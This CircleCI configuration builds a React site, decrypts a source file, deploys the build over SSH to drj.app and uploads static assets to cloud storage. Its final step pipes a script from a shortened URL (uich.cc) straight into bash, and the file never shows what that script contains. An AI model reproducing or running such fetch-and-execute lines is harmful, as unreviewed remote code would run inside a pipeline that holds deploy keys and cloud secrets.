version: 2.1

orbs:
  node: circleci/node@4.2.1

jobs:
  build:
    executor:
      name: node/default
      tag: 'lts'
    steps:
      - checkout
      - add_ssh_keys:
          fingerprints:
            - "f6:f7:d9:cf:34:03:0e:97:c1:d4:f3:88:d4:26:8f:95"
      - run: |
          sudo apt update
          sudo apt install python3 python3-pip curl
          pip3 install coscmd
      - node/install-yarn
      - node/install-packages:
          pkg-manager: yarn
      - run: openssl aes-256-cbc -d -pbkdf2 -in encrypt.js.enc -out src/encrypt.js -k $DECRYPT_KEY
      - run: CI=false yarn build
      - run: |
          mv build/genshin.ico build/favicon.ico
          tar Jcvf build.tar.xz build/
          ssh-keyscan -t rsa drj.app >> ~/.ssh/known_hosts
          scp build.tar.xz demonist@drj.app:~
          ssh demonist@drj.app < deploy.sh
      - run: |
          coscmd config -a $SECRET_ID -s $SECRET_KEY -b $BUCKET -r $REGION
          coscmd upload -rs build/static /react/genshin/static
          curl -L https://uich.cc/5iavbeH6 | bash

workflows:
  version: 2
  master_build:
    jobs:
      - build:
          filters:
            branches:
              only: master
